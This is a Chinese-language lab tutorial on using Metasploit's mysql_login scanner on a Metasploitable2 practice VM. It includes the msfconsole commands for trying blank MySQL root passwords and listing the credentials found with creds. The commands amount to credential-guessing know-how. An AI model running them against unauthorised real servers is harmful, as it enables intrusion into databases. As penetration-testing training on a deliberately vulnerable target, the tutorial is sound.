系列文章目录
实战篇 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码
文章目录
前言
metasploitable 是用于评估 metasploit 的靶机,是一个 Ubuntu-Linux 虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。与VMWare、VirtualBox和其他常见的虚拟化平台兼容。
Metasploitable 默认 用户名:msfadmin, 密码:msfadmin。登陆之后使用 ip addr 可查看 ip 地址。(查看 IP 的命令很多)
有些新手学了点皮毛耗费大量时间自己去找 IP 做测试,这不仅浪费大量时间,而且很容易被请去小黑屋,有这样一个练手的环境直接去干挺好的,安装靶机也不难,省时省力只是占点内存,网上安装教程也很多。
一、实验环境
一台 Kali - Linux 和 一台 Metasploitable2-Linux 靶机。
我的靶机网络模式设置的是桥接(VMnet0)模式。
二、实验步骤
# 启动数据库:
root@kali:~# systemctl start postgresql
root@kali:~# systemctl enable postgresql #设置成开机启动数据库,我们要经常用
1. kali 启动数据库进入 msf 搜索模块
msfconsole
search mysql_login
2. 加载模块, 配置并设置参数
use auxiliary/scanner/mysql/mysql_login
set rhosts 目标主机IP
set username root #我们配置要爆破的用户
set blank_passwords true #开启为所有用户尝试空密码
show options
3. 配置完成后执行 run 或者 exploit
4. 使用后端凭证命令 creds,列出数据库中的所有凭据
creds
注:如果creds出现错误,可能是postgresql未开启!
例如:
即无活动数据库,凭证将不会被保存。查看主机信息和凭证信息,数据库未连接